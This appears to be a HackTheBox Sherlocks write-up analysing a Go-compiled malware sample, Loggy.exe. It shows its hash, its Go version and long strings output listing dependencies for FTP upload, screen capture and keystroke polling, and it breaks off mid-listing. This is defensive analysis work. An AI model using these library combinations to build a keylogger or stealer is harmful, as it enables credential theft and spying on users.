HackTheBox Sherlocks

Janice from accounting is beside herself! She was contacted by the SOC to tell her that her work credentials were found on the dark web by the threat intel team. We managed to recover some files from her machine and sent them to our REM analyst.

Task 1

What is the SHA-256 hash of this malware binary?

┌──(0xneobyte㉿0xNeoShell)-[~/Loggy]
└─$ sha256sum Loggy.exe
6acd8a362def62034cbd011e6632ba5120196e2011c83dc6045fcb28b590457c  Loggy.exe

Task 2

Go release versions follow the goX.Y.Z format, and since Go 2 has never shipped, every stable release string begins with go1. Grepping the strings for that prefix is enough to find the toolchain that built the binary.

┌──(0xneobyte㉿0xNeoShell)-[~/Loggy]
└─$ strings Loggy.exe | grep "go1"
runtime: sp=abi mismatchRevertToSelfCreateEventWGetConsoleCPUnlockFileExVirtualQueryiphlpapi.dllnetapi32.dllinvalid slothost is downillegal seekGetLengthSidGetStdHandleGetTempPathWLoadLibraryWReadConsoleWSetEndOfFileTransmitFileGetAddrInfoWnot pollabletlsunsafeekmclose notifyremote errorc hs traffics hs trafficc ap traffics ap trafficmultipathtcp127.0.0.1:53no such hostunknown portinvalid portgetaddrinfowtransmitfileChooseColorWCreateBitmapGetTextColorGradientFillSetLastErroroleaut32.dllPdhOpenQueryWindowFromDCwinspool.drvgotypesaliashttpmuxgo121randautoseedECDSA-SHA256ECDSA-SHA384ECDSA-SHA512RCodeSuccessRCodeRefusedCfgMgr32.dllsetupapi.dllwintrust.dllwtsapi32.dllReportEventWCreateMutexWGetProcessIdReleaseMutexSetErrorModeSetStdHandleThread32NextVirtualAllocNtCreateFileCoCreateGuidinvalid baseSERIALNUMBERavx5124fmapsavx512bitalgfilter methodFindFirstFileparsing time  out of rangeCloseEventLogControlTraceWOpenEventLogWReadEventLogWRegEnumKeyExWRegOpenKeyExWStartServiceWImageList_AddGetDeviceCapsSetBrushOrgExRtlMoveMemoryFindResourceWModule32NextWSetSystemTimeGetSystemTimeVirtualFreeExSysFreeStringwglShareListsEnumProcessesShellExecuteWDestroyWindowGetWindowRectGetClientRectIntersectRectOpenClipboardFindWindowExWGetClassNameWBitBlt failed3814697265625invalid base not availablewakeableSleepprofMemActiveprofMemFuturetraceStackTabexecRInternaltestRInternalGC sweep waitout of memory is nil, not value method bad map state span.base()=bad flushGen , not pointer != sweepgen  MB globals,  work.nproc=  work.nwait=  nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error:  idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failednil stackbase}
go1.22.3
C:/Program Files/Go/src/sort/sort_impl_go121.go
C:/Program Files/Go/src/vendor/golang.org/x/sys/cpu/runtime_auxv_go121.go
C:/Program Files/Go/src/vendor/golang.org/x/crypto/internal/poly1305/bits_go1.13.go
go1.22.3
 

The matches fall into three groups: a long run of Go runtime error strings that only matched because it contains the GODEBUG setting name httpmuxgo121, standard-library source paths such as sort_impl_go121.go that were compiled into the binary, and the bare version string go1.22.3.

go1.22.3 appears twice, confirming the Go version used to compile the binary. A quicker check that needs no grepping: `go version -m Loggy.exe` reads the embedded build info directly and prints the same version string along with the module list used in the next task.

Task 3

There are multiple GitHub repos referenced in the static strings. Which GitHub repo would most likely suggest the ability of this malware to exfiltrate data?

┌──(0xneobyte㉿0xNeoShell)-[~/Loggy]
└─$ strings Loggy.exe | grep "github"
github.com/lxn/win
github.com/jlaffaye/ftp
"github.com/hashicorp/go-multierror
dep	github.com/TheTitanrain/w32	v0.0.0-20200114052255-2654d97dbd3d	h1:2xp1BQbqcDDaikHnASWpVZRjibOxu7y9LhAv04whugI=
dep	github.com/hashicorp/errwrap	v1.0.0	h1:hLrqtEDnRye3+sgx6z4qVLNuviH3MR5aQ0ykNJa/UYA=
dep	github.com/hashicorp/go-multierror	v1.1.1	h1:H5DkEtf6CXdFp0N0Em5UCwQpXMWke8IA0+lD48awMYo=
dep	github.com/jlaffaye/ftp	v0.2.0	h1:lXNvW7cBu7R/68bknOX3MrRIIqZ61zELs1P2RAiA3lg=
dep	github.com/kbinani/screenshot	v0.0.0-20230812210009-b87d31814237	h1:YOp8St+CM/AQ9Vp4XYm4272E77MptJDHkwypQHIRl9Q=
dep	github.com/lxn/win	v0.0.0-20210218163916-a377121e959e	h1:H+t6A/QJMbhCSEH5rAuRxh+CtW96g0Or0Fxa9IKr4uc=
github.com/TheTitanrain/w32.init
github.com/hashicorp/go-multierror.Append
github.com/hashicorp/go-multierror.ListFormatFunc
github.com/hashicorp/go-multierror.(*Error).Error
github.com/hashicorp/go-multierror.(*Error).GoString
github.com/hashicorp/go-multierror.(*Error).Unwrap
github.com/hashicorp/go-multierror.chain.Error
github.com/hashicorp/go-multierror.chain.Unwrap
github.com/hashicorp/go-multierror.chain.As
github.com/hashicorp/go-multierror.chain.Is
github.com/hashicorp/go-multierror.Error.Len
github.com/hashicorp/go-multierror.Error.Swap
github.com/hashicorp/go-multierror.Error.Less
github.com/hashicorp/go-multierror.(*Error).Len
github.com/hashicorp/go-multierror.(*Error).Less
github.com/hashicorp/go-multierror.(*Error).Swap
github.com/hashicorp/go-multierror.(*chain).As
github.com/hashicorp/go-multierror.(*chain).Error
github.com/hashicorp/go-multierror.(*chain).Is
github.com/hashicorp/go-multierror.(*chain).Unwrap
github.com/jlaffaye/ftp.(*debugWrapper).Close
github.com/jlaffaye/ftp.Dial
github.com/jlaffaye/ftp.(*ServerConn).authTLS
github.com/jlaffaye/ftp.Dial.func2
github.com/jlaffaye/ftp.Dial.func1
github.com/jlaffaye/ftp.(*dialOptions).wrapConn
github.com/jlaffaye/ftp.newDebugWrapper
github.com/jlaffaye/ftp.(*ServerConn).Login
github.com/jlaffaye/ftp.(*ServerConn).Type
github.com/jlaffaye/ftp.(*ServerConn).feat
github.com/jlaffaye/ftp.(*ServerConn).setUTF8
github.com/jlaffaye/ftp.(*ServerConn).epsv
github.com/jlaffaye/ftp.(*ServerConn).pasv
github.com/jlaffaye/ftp.(*ServerConn).getDataConnPort
github.com/jlaffaye/ftp.(*ServerConn).openDataConn
github.com/jlaffaye/ftp.(*ServerConn).cmd
github.com/jlaffaye/ftp.(*ServerConn).cmdDataConnFrom
github.com/jlaffaye/ftp.(*ServerConn).checkDataShut
github.com/jlaffaye/ftp.(*ServerConn).StorFrom
github.com/hashicorp/go-multierror.(*Error).ErrorOrNil
github.com/jlaffaye/ftp.(*ServerConn).Quit
github.com/jlaffaye/ftp.init
type:.eq.github.com/jlaffaye/ftp.debugWrapper
github.com/jlaffaye/ftp.debugWrapper.Read
github.com/jlaffaye/ftp.(*debugWrapper).Read
github.com/jlaffaye/ftp.debugWrapper.Write
github.com/jlaffaye/ftp.(*debugWrapper).Write
github.com/kbinani/screenshot/internal/util.CreateImage
github.com/kbinani/screenshot/internal/util.CreateImage.func1
github.com/lxn/win.init.0
github.com/lxn/win.init.1
github.com/lxn/win.init.2
github.com/lxn/win.init.3
github.com/lxn/win.BitBlt
github.com/lxn/win.CreateCompatibleBitmap
github.com/lxn/win.CreateCompatibleDC
github.com/lxn/win.DeleteDC
github.com/lxn/win.DeleteObject
github.com/lxn/win.GetDIBits
github.com/lxn/win.SelectObject
github.com/lxn/win.init.4
github.com/lxn/win.init.5
github.com/lxn/win.GlobalAlloc
github.com/lxn/win.GlobalFree
github.com/lxn/win.GlobalLock
github.com/lxn/win.GlobalUnlock
github.com/lxn/win.init.6
github.com/lxn/win.init.7
github.com/lxn/win.init.8
github.com/lxn/win.init.9
github.com/lxn/win.init.10
github.com/lxn/win.init.11
github.com/lxn/win.GetDC
github.com/lxn/win.ReleaseDC
github.com/lxn/win.init.12
github.com/lxn/win.init.13
github.com/kbinani/screenshot.init
github.com/kbinani/screenshot.CaptureRect
github.com/kbinani/screenshot.Capture
github.com/kbinani/screenshot.getDesktopWindow
github.com/kbinani/screenshot.Capture.deferwrap6
github.com/kbinani/screenshot.Capture.deferwrap5
github.com/kbinani/screenshot.Capture.deferwrap4
github.com/kbinani/screenshot.Capture.deferwrap3
github.com/kbinani/screenshot.Capture.deferwrap2
github.com/kbinani/screenshot.Capture.deferwrap1
github.com/kbinani/screenshot.NumActiveDisplays
github.com/kbinani/screenshot.enumDisplayMonitors
github.com/kbinani/screenshot.GetDisplayBounds
github.com/kbinani/screenshot.countupMonitorCallback
github.com/kbinani/screenshot.getMonitorBoundsCallback
github.com/kbinani/screenshot.getMonitorRealSize
github.com/TheTitanrain/w32.GetAsyncKeyState
github.com/jlaffaye/ftp.(*ServerConn).Stor
C:/Users/verme/go/pkg/mod/github.com/!the!titanrain/w32@v0.0.0-20200114052255-2654d97dbd3d/advapi32.go
C:/Users/verme/go/pkg/mod/github.com/!the!titanrain/w32@v0.0.0-20200114052255-2654d97dbd3d/alpc.go
C:/Users/verme/go/pkg/mod/github.com/!the!titanrain/w32@v0.0.0-20200114052255-2654d97dbd3d/comctl32.go
C:/Users/verme/go/pkg/mod/github.com/!the!titanrain/w32@v0.0.0-20200114052255-2654d97dbd3d/comdlg32.go
C:/Users/verme/go/pkg/mod/github.com/!the!titanrain/w32@v0.0.0-20200114052255-2654d97dbd3d/create_process.go
C:/Users/verme/go/pkg/mod/github.com/!the!titanrain/w32@v0.0.0-20200114052255-2654d97dbd3d/dwmapi.go
C:/Users/verme/go/pkg/mod/github.com/!the!titanrain/w32@v0.0.0-20200114052255-2654d97dbd3d/fork.go
C:/Users/verme/go/pkg/mod/github.com/!the!titanrain/w32@v0.0.0-20200114052255-2654d97dbd3d/gdi32.go
C:/Users/verme/go/pkg/mod/github.com/!the!titanrain/w32@v0.0.0-20200114052255-2654d97dbd3d/gdiplus.go
C:/Users/verme/go/pkg/mod/github.com/!the!titanrain/w32@v0.0.0-20200114052255-2654d97dbd3d/kernel32.go
C:/Users/verme/go/pkg/mod/github.com/!the!titanrain/w32@v0.0.0-20200114052255-2654d97dbd3d/ole32.go
C:/Users/verme/go/pkg/mod/github.com/!the!titanrain/w32@v0.0.0-20200114052255-2654d97dbd3d/oleaut32.go
C:/Users/verme/go/pkg/mod/github.com/!the!titanrain/w32@v0.0.0-20200114052255-2654d97dbd3d/opengl32.go
C:/Users/verme/go/pkg/mod/github.com/!the!titanrain/w32@v0.0.0-20200114052255-2654d97dbd3d/psapi.go
C:/Users/verme/go/pkg/mod/github.com/!the!titanrain/w32@v0.0.0-20200114052255-2654d97dbd3d/shell32.go
C:/Users/verme/go/pkg/mod/github.com/!the!titanrain/w32@v0.0.0-20200114052255-2654d97dbd3d/user32.go
C:/Users/verme/go/pkg/mod/github.com/hashicorp/go-multierror@v1.1.1/append.go
C:/Users/verme/go/pkg/mod/github.com/hashicorp/go-multierror@v1.1.1/format.go
C:/Users/verme/go/pkg/mod/github.com/hashicorp/go-multierror@v1.1.1/multierror.go
C:/Users/verme/go/pkg/mod/github.com/hashicorp/go-multierror@v1.1.1/sort.go
C:/Users/verme/go/pkg/mod/github.com/jlaffaye/ftp@v0.2.0/debug.go
C:/Users/verme/go/pkg/mod/github.com/jlaffaye/ftp@v0.2.0/ftp.go
C:/Users/verme/go/pkg/mod/github.com/jlaffaye/ftp@v0.2.0/status.go
C:/Users/verme/go/pkg/mod/github.com/kbinani/screenshot@v0.0.0-20230812210009-b87d31814237/internal/util/util.go
C:/Users/verme/go/pkg/mod/github.com/lxn/win@v0.0.0-20210218163916-a377121e959e/advapi32.go
C:/Users/verme/go/pkg/mod/github.com/lxn/win@v0.0.0-20210218163916-a377121e959e/comctl32.go
C:/Users/verme/go/pkg/mod/github.com/lxn/win@v0.0.0-20210218163916-a377121e959e/comdlg32.go
C:/Users/verme/go/pkg/mod/github.com/lxn/win@v0.0.0-20210218163916-a377121e959e/gdi32.go
C:/Users/verme/go/pkg/mod/github.com/lxn/win@v0.0.0-20210218163916-a377121e959e/gdiplus.go
C:/Users/verme/go/pkg/mod/github.com/lxn/win@v0.0.0-20210218163916-a377121e959e/kernel32.go
C:/Users/verme/go/pkg/mod/github.com/lxn/win@v0.0.0-20210218163916-a377121e959e/ole32.go
C:/Users/verme/go/pkg/mod/github.com/lxn/win@v0.0.0-20210218163916-a377121e959e/oleaut32.go
C:/Users/verme/go/pkg/mod/github.com/lxn/win@v0.0.0-20210218163916-a377121e959e/opengl32.go
C:/Users/verme/go/pkg/mod/github.com/lxn/win@v0.0.0-20210218163916-a377121e959e/pdh.go
C:/Users/verme/go/pkg/mod/github.com/lxn/win@v0.0.0-20210218163916-a377121e959e/shell32.go
C:/Users/verme/go/pkg/mod/github.com/lxn/win@v0.0.0-20210218163916-a377121e959e/user32.go
C:/Users/verme/go/pkg/mod/github.com/lxn/win@v0.0.0-20210218163916-a377121e959e/uxtheme.go
C:/Users/verme/go/pkg/mod/github.com/lxn/win@v0.0.0-20210218163916-a377121e959e/winspool.go
C:/Users/verme/go/pkg/mod/github.com/kbinani/screenshot@v0.0.0-20230812210009-b87d31814237/screenshot_windows.go
C:/Users/verme/go/pkg/mod/github.com/kbinani/screenshot@v0.0.0-20230812210009-b87d31814237/screenshot.go
dep	github.com/TheTitanrain/w32	v0.0.0-20200114052255-2654d97dbd3d	h1:2xp1BQbqcDDaikHnASWpVZRjibOxu7y9LhAv04whugI=
dep	github.com/hashicorp/errwrap	v1.0.0	h1:hLrqtEDnRye3+sgx6z4qVLNuviH3MR5aQ0ykNJa/UYA=
dep	github.com/hashicorp/go-multierror	v1.1.1	h1:H5DkEtf6CXdFp0N0Em5UCwQpXMWke8IA0+lD48awMYo=
dep	github.com/jlaffaye/ftp	v0.2.0	h1:lXNvW7cBu7R/68bknOX3MrRIIqZ61zELs1P2RAiA3lg=
dep	github.com/kbinani/screenshot	v0.0.0-20230812210009-b87d31814237	h1:YOp8St+CM/AQ9Vp4XYm4272E77MptJDHkwypQHIRl9Q=
dep	github.com/lxn/win	v0.0.0-20210218163916-a377121e959e	h1:H+t6A/QJMbhCSEH5rAuRxh+CtW96g0Or0Fxa9IKr4uc=
github.com/TheTitanrain/w32.init
github.com/hashicorp/go-multierror.Append
github.com/hashicorp/go-multierror.ListFormatFunc
github.com/hashicorp/go-multierror.(*Error).Error
github.com/hashicorp/go-multierror.(*Error).GoString
github.com/hashicorp/go-multierror.(*Error).Unwrap
github.com/hashicorp/go-multierror.chain.Error
github.com/hashicorp/go-multierror.chain.Unwrap
github.com/hashicorp/go-multierror.chain.As
github.com/hashicorp/go-multierror.chain.Is
github.com/hashicorp/go-multierror.Error.Len
github.com/hashicorp/go-multierror.Error.Swap
github.com/hashicorp/go-multierror.Error.Less
github.com/hashicorp/go-multierror.(*Error).Len
github.com/hashicorp/go-multierror.(*Error).Less
github.com/hashicorp/go-multierror.(*Error).Swap
github.com/hashicorp/go-multierror.(*chain).As
github.com/hashicorp/go-multierror.(*chain).Error
github.com/hashicorp/go-multierror.(*chain).Is
github.com/hashicorp/go-multierror.(*chain).Unwrap
github.com/jlaffaye/ftp.(*debugWrapper).Close
github.com/jlaffaye/ftp.Dial
github.com/jlaffaye/ftp.Dial.func2
github.com/jlaffaye/ftp.Dial.func1
github.com/jlaffaye/ftp.(*dialOptions).wrapConn
github.com/jlaffaye/ftp.(*ServerConn).Login
github.com/jlaffaye/ftp.(*ServerConn).feat
github.com/jlaffaye/ftp.(*ServerConn).setUTF8
github.com/jlaffaye/ftp.(*ServerConn).epsv
github.com/jlaffaye/ftp.(*ServerConn).pasv
github.com/jlaffaye/ftp.(*ServerConn).getDataConnPort
github.com/jlaffaye/ftp.(*ServerConn).openDataConn
github.com/jlaffaye/ftp.(*ServerConn).cmd
github.com/jlaffaye/ftp.(*ServerConn).cmdDataConnFrom
github.com/jlaffaye/ftp.(*ServerConn).checkDataShut
github.com/jlaffaye/ftp.(*ServerConn).StorFrom
github.com/jlaffaye/ftp.(*ServerConn).Quit
github.com/jlaffaye/ftp.init
type:.eq.github.com/jlaffaye/ftp.debugWrapper
github.com/jlaffaye/ftp.debugWrapper.Read
github.com/jlaffaye/ftp.(*debugWrapper).Read
github.com/jlaffaye/ftp.debugWrapper.Write
github.com/jlaffaye/ftp.(*debugWrapper).Write
github.com/kbinani/screenshot/internal/util.CreateImage
github.com/kbinani/screenshot/internal/util.CreateImage.func1
github.com/lxn/win.init.0
github.com/lxn/win.init.1
github.com/lxn/win.init.2
github.com/lxn/win.init.3
github.com/lxn/win.BitBlt
github.com/lxn/win.CreateCompatibleBitmap
github.com/lxn/win.CreateCompatibleDC
github.com/lxn/win.DeleteDC
github.com/lxn/win.DeleteObject
github.com/lxn/win.GetDIBits
github.com/lxn/win.SelectObject
github.com/lxn/win.init.4
github.com/lxn/win.init.5
github.com/lxn/win.GlobalAlloc
github.com/lxn/win.GlobalFree
github.com/lxn/win.GlobalLock
github.com/lxn/win.GlobalUnlock
github.com/lxn/win.init.6
github.com/lxn/win.init.7
github.com/lxn/win.init.8
github.com/lxn/win.init.9
github.com/lxn/win.init.10
github.com/lxn/win.init.11
github.com/lxn/win.GetDC
github.com/lxn/win.ReleaseDC
github.com/lxn/win.init.12
github.com/lxn/win.init.13
github.com/kbinani/screenshot.init
github.com/kbinani/screenshot.CaptureRect
github.com/kbinani/screenshot.Capture
github.com/kbinani/screenshot.Capture.deferwrap6
github.com/kbinani/screenshot.Capture.deferwrap5
github.com/kbinani/screenshot.Capture.deferwrap4
github.com/kbinani/screenshot.Capture.deferwrap3
github.com/kbinani/screenshot.Capture.deferwrap2
github.com/kbinani/screenshot.Capture.deferwrap1
github.com/kbinani/screenshot.NumActiveDisplays
github.com/kbinani/screenshot.GetDisplayBounds
github.com/kbinani/screenshot.countupMonitorCallback
github.com/kbinani/screenshot.getMonitorBoundsCallback
github.com/kbinani/screenshot.getMonitorRealSize
github.com/TheTitanrain/w32..inittask
github.com/TheTitanrain/w32.modadvapi32
github.com/TheTitanrain/w32.modntdll
github.com/TheTitanrain/w32.modcomctl32
github.com/TheTitanrain/w32.modcomdlg32
github.com/TheTitanrain/w32.kernel32
github.com/TheTitanrain/w32.moddwmapi
github.com/TheTitanrain/w32.ntdll
github.com/TheTitanrain/w32.modgdi32
github.com/TheTitanrain/w32.modgdiplus
github.com/TheTitanrain/w32.modkernel32
github.com/TheTitanrain/w32.modole32
github.com/TheTitanrain/w32.modoleaut32
github.com/TheTitanrain/w32.modopengl32
github.com/TheTitanrain/w32.modpsapi
github.com/TheTitanrain/w32.modshell32
github.com/TheTitanrain/w32.moduser32
github.com/TheTitanrain/w32.procGetAsyncKeyState
github.com/jlaffaye/ftp..inittask
github.com/jlaffaye/ftp..typeAssert.3
github.com/jlaffaye/ftp..typeAssert.4
github.com/jlaffaye/ftp..typeAssert.5
github.com/jlaffaye/ftp..typeAssert.6
github.com/jlaffaye/ftp..typeAssert.12
github.com/jlaffaye/ftp..typeAssert.13
github.com/kbinani/screenshot..inittask
github.com/kbinani/screenshot.libUser32
github.com/kbinani/screenshot.funcGetDesktopWindow
github.com/kbinani/screenshot.funcEnumDisplayMonitors
github.com/kbinani/screenshot.funcGetMonitorInfo
github.com/kbinani/screenshot.funcEnumDisplaySettings
github.com/lxn/win..inittask
github.com/lxn/win.libadvapi32
github.com/lxn/win.regCloseKey
github.com/lxn/win.regOpenKeyEx
github.com/lxn/win.regQueryValueEx
github.com/lxn/win.regEnumValue
github.com/lxn/win.regSetValueEx
github.com/lxn/win.libcomctl32
github.com/lxn/win.imageList_Add
github.com/lxn/win.imageList_AddMasked
github.com/lxn/win.imageList_Create
github.com/lxn/win.imageList_Destroy
github.com/lxn/win.imageList_DrawEx
github.com/lxn/win.imageList_ReplaceIcon
github.com/lxn/win.initCommonControlsEx
github.com/lxn/win.loadIconMetric
github.com/lxn/win.loadIconWithScaleDown
github.com/lxn/win.libcomdlg32
github.com/lxn/win.chooseColor
github.com/lxn/win.commDlgExtendedError
github.com/lxn/win.getOpenFileName
github.com/lxn/win.getSaveFileName
github.com/lxn/win.printDlgEx
github.com/lxn/win.libgdi32
github.com/lxn/win.libmsimg32
github.com/lxn/win.abortDoc
github.com/lxn/win.addFontResourceEx
github.com/lxn/win.addFontMemResourceEx
github.com/lxn/win.alphaBlend
github.com/lxn/win.bitBlt
github.com/lxn/win.choosePixelFormat
github.com/lxn/win.closeEnhMetaFile
github.com/lxn/win.combineRgn
github.com/lxn/win.copyEnhMetaFile
github.com/lxn/win.createBitmap
github.com/lxn/win.createCompatibleBitmap
github.com/lxn/win.createBrushIndirect
github.com/lxn/win.createCompatibleDC
github.com/lxn/win.createDC
github.com/lxn/win.createDIBSection
github.com/lxn/win.createFontIndirect
github.com/lxn/win.createEnhMetaFile
github.com/lxn/win.createIC
github.com/lxn/win.createPatternBrush
github.com/lxn/win.createRectRgn
github.com/lxn/win.deleteDC
github.com/lxn/win.deleteEnhMetaFile
github.com/lxn/win.deleteObject
github.com/lxn/win.ellipse
github.com/lxn/win.endDoc
github.com/lxn/win.endPage
github.com/lxn/win.excludeClipRect
github.com/lxn/win.extCreatePen
github.com/lxn/win.fillRgn
github.com/lxn/win.gdiFlush
github.com/lxn/win.getBkColor
github.com/lxn/win.getDeviceCaps
github.com/lxn/win.getDIBits
github.com/lxn/win.getEnhMetaFile
github.com/lxn/win.getEnhMetaFileHeader
github.com/lxn/win.getObject
github.com/lxn/win.getPixel
github.com/lxn/win.getRgnBox
github.com/lxn/win.getStockObject
github.com/lxn/win.getTextColor
github.com/lxn/win.getTextExtentExPoint
github.com/lxn/win.getTextExtentPoint32
github.com/lxn/win.getTextMetrics
github.com/lxn/win.getViewportOrgEx
github.com/lxn/win.gradientFill
github.com/lxn/win.intersectClipRect
github.com/lxn/win.lineTo
github.com/lxn/win.moveToEx
github.com/lxn/win.playEnhMetaFile
github.com/lxn/win.polyline
github.com/lxn/win.rectangle
github.com/lxn/win.removeFontResourceEx
github.com/lxn/win.removeFontMemResourceEx
github.com/lxn/win.resetDC
github.com/lxn/win.restoreDC
github.com/lxn/win.roundRect
github.com/lxn/win.selectObject
github.com/lxn/win.setBkColor
github.com/lxn/win.setBkMode
github.com/lxn/win.setBrushOrgEx
github.com/lxn/win.setDIBits
github.com/lxn/win.setPixel
github.com/lxn/win.setPixelFormat
github.com/lxn/win.setStretchBltMode
github.com/lxn/win.setTextColor
github.com/lxn/win.setViewportOrgEx
github.com/lxn/win.saveDC
github.com/lxn/win.startDoc
github.com/lxn/win.startPage
github.com/lxn/win.stretchBlt
github.com/lxn/win.swapBuffers
github.com/lxn/win.textOut
github.com/lxn/win.transparentBlt
github.com/lxn/win.libgdiplus
github.com/lxn/win.gdipCreateBitmapFromFile
github.com/lxn/win.gdipCreateBitmapFromHBITMAP
github.com/lxn/win.gdipCreateHBITMAPFromBitmap
github.com/lxn/win.gdipDisposeImage
github.com/lxn/win.gdiplusShutdown
github.com/lxn/win.gdiplusStartup
github.com/lxn/win.libkernel32
github.com/lxn/win.activateActCtx
github.com/lxn/win.closeHandle
github.com/lxn/win.createActCtx
github.com/lxn/win.fileTimeToSystemTime
github.com/lxn/win.findResource
github.com/lxn/win.getConsoleTitle
github.com/lxn/win.getConsoleWindow
github.com/lxn/win.getCurrentThreadId
github.com/lxn/win.getLastError
github.com/lxn/win.getLocaleInfo
github.com/lxn/win.getLogicalDriveStrings
github.com/lxn/win.getModuleHandle
github.com/lxn/win.getNumberFormat
github.com/lxn/win.getPhysicallyInstalledSystemMemory
github.com/lxn/win.getProfileString
github.com/lxn/win.getThreadLocale
github.com/lxn/win.getThreadUILanguage
github.com/lxn/win.getVersion
github.com/lxn/win.globalAlloc
github.com/lxn/win.globalFree
github.com/lxn/win.globalLock
github.com/lxn/win.globalUnlock
github.com/lxn/win.moveMemory
github.com/lxn/win.mulDiv
github.com/lxn/win.loadResource
github.com/lxn/win.lockResource
github.com/lxn/win.setLastError
github.com/lxn/win.sizeofResource
github.com/lxn/win.systemTimeToFileTime
github.com/lxn/win.libole32
github.com/lxn/win.coCreateInstance
github.com/lxn/win.coGetClassObject
github.com/lxn/win.coInitializeEx
github.com/lxn/win.coTaskMemFree
github.com/lxn/win.coUninitialize
github.com/lxn/win.oleInitialize
github.com/lxn/win.oleSetContainedObject
github.com/lxn/win.oleUninitialize
github.com/lxn/win.liboleaut32
github.com/lxn/win.sysAllocString
github.com/lxn/win.sysFreeString
github.com/lxn/win.sysStringLen
github.com/lxn/win.lib
github.com/lxn/win.wglCopyContext
github.com/lxn/win.wglCreateContext
github.com/lxn/win.wglCreateLayerContext
github.com/lxn/win.wglDeleteContext
github.com/lxn/win.wglDescribeLayerPlane
github.com/lxn/win.wglGetCurrentContext
github.com/lxn/win.wglGetCurrentDC
github.com/lxn/win.wglGetLayerPaletteEntries
github.com/lxn/win.wglGetProcAddress
github.com/lxn/win.wglMakeCurrent
github.com/lxn/win.wglRealizeLayerPalette
github.com/lxn/win.wglSetLayerPaletteEntries
github.com/lxn/win.wglShareLists
github.com/lxn/win.wglSwapLayerBuffers
github.com/lxn/win.wglUseFontBitmaps
github.com/lxn/win.wglUseFontOutlines
github.com/lxn/win.libpdhDll
github.com/lxn/win.pdh_AddCounterW
github.com/lxn/win.pdh_AddEnglishCounterW
github.com/lxn/win.pdh_CloseQuery
github.com/lxn/win.pdh_CollectQueryData
github.com/lxn/win.pdh_GetFormattedCounterValue
github.com/lxn/win.pdh_GetFormattedCounterArrayW
github.com/lxn/win.pdh_OpenQuery
github.com/lxn/win.pdh_ValidatePathW
github.com/lxn/win.libshell32
github.com/lxn/win.dragAcceptFiles
github.com/lxn/win.dragFinish
github.com/lxn/win.dragQueryFile
github.com/lxn/win.extractIcon
github.com/lxn/win.shBrowseForFolder
github.com/lxn/win.shDefExtractIcon
github.com/lxn/win.shGetFileInfo
github.com/lxn/win.shGetPathFromIDList
github.com/lxn/win.shGetSpecialFolderPath
github.com/lxn/win.shParseDisplayName
github.com/lxn/win.shGetStockIconInfo
github.com/lxn/win.shellExecute
github.com/lxn/win.shell_NotifyIcon
github.com/lxn/win.libuser32
github.com/lxn/win.addClipboardFormatListener
github.com/lxn/win.adjustWindowRect
github.com/lxn/win.attachThreadInput
github.com/lxn/win.animateWindow
github.com/lxn/win.beginDeferWindowPos
github.com/lxn/win.beginPaint
github.com/lxn/win.bringWindowToTop
github.com/lxn/win.callWindowProc
github.com/lxn/win.changeWindowMessageFilterEx
github.com/lxn/win.checkMenuRadioItem
github.com/lxn/win.clientToScreen
github.com/lxn/win.closeClipboard
github.com/lxn/win.createDialogParam
github.com/lxn/win.createIconIndirect
github.com/lxn/win.createMenu
github.com/lxn/win.createPopupMenu
github.com/lxn/win.createWindowEx
github.com/lxn/win.deferWindowPos
github.com/lxn/win.defWindowProc
github.com/lxn/win.deleteMenu
github.com/lxn/win.destroyIcon
github.com/lxn/win.destroyMenu
github.com/lxn/win.destroyWindow
github.com/lxn/win.dialogBoxParam
github.com/lxn/win.dispatchMessage
github.com/lxn/win.drawIconEx
github.com/lxn/win.drawMenuBar
github.com/lxn/win.drawFocusRect
github.com/lxn/win.drawTextEx
github.com/lxn/win.emptyClipboard
github.com/lxn/win.enableMenuItem
github.com/lxn/win.enableWindow
github.com/lxn/win.endDeferWindowPos
github.com/lxn/win.endDialog
github.com/lxn/win.endPaint
github.com/lxn/win.enumChildWindows
github.com/lxn/win.findWindow
github.com/lxn/win.getActiveWindow
github.com/lxn/win.getAncestor
github.com/lxn/win.getCaretPos
github.com/lxn/win.getClassName
github.com/lxn/win.getClientRect
github.com/lxn/win.getClipboardData
github.com/lxn/win.getCursorPos
github.com/lxn/win.getDC
github.com/lxn/win.getDesktopWindow
github.com/lxn/win.getDlgItem
github.com/lxn/win.getDpiForWindow
github.com/lxn/win.getFocus
github.com/lxn/win.getForegroundWindow
github.com/lxn/win.getIconInfo
github.com/lxn/win.getKeyState
github.com/lxn/win.getMenuCheckMarkDimensions
github.com/lxn/win.getMenuInfo
github.com/lxn/win.getMenuItemCount
github.com/lxn/win.getMenuItemID
github.com/lxn/win.getMenuItemInfo
github.com/lxn/win.getMessage
github.com/lxn/win.getMonitorInfo
github.com/lxn/win.getParent
github.com/lxn/win.getRawInputData
github.com/lxn/win.getScrollInfo
github.com/lxn/win.getSubMenu
github.com/lxn/win.getSysColor
github.com/lxn/win.getSysColorBrush
github.com/lxn/win.getSystemMenu
github.com/lxn/win.getSystemMetrics
github.com/lxn/win.getSystemMetricsForDpi
github.com/lxn/win.getWindow
github.com/lxn/win.getWindowLong
github.com/lxn/win.getWindowLongPtr
github.com/lxn/win.getWindowPlacement
github.com/lxn/win.getWindowRect
github.com/lxn/win.getWindowThreadProcessId
github.com/lxn/win.insertMenuItem
github.com/lxn/win.invalidateRect
github.com/lxn/win.isChild
github.com/lxn/win.isClipboardFormatAvailable
github.com/lxn/win.isDialogMessage
github.com/lxn/win.isIconic
github.com/lxn/win.isWindowEnabled
github.com/lxn/win.isWindowVisible
github.com/lxn/win.isZoomed
github.com/lxn/win.killTimer
github.com/lxn/win.loadCursor
github.com/lxn/win.loadIcon
github.com/lxn/win.loadImage
github.com/lxn/win.loadMenu
github.com/lxn/win.loadString
github.com/lxn/win.messageBeep
github.com/lxn/win.messageBox
github.com/lxn/win.monitorFromWindow
github.com/lxn/win.moveWindow
github.com/lxn/win.notifyWinEvent
github.com/lxn/win.unregisterClass
github.com/lxn/win.openClipboard
github.com/lxn/win.peekMessage
github.com/lxn/win.postMessage
github.com/lxn/win.postQuitMessage
github.com/lxn/win.redrawWindow
github.com/lxn/win.registerClassEx
github.com/lxn/win.registerRawInputDevices
github.com/lxn/win.registerWindowMessage
github.com/lxn/win.releaseCapture
github.com/lxn/win.releaseDC
github.com/lxn/win.removeMenu
github.com/lxn/win.screenToClient
github.com/lxn/win.sendDlgItemMessage
github.com/lxn/win.sendInput
github.com/lxn/win.sendMessage
github.com/lxn/win.setActiveWindow
github.com/lxn/win.setCapture
github.com/lxn/win.setClipboardData
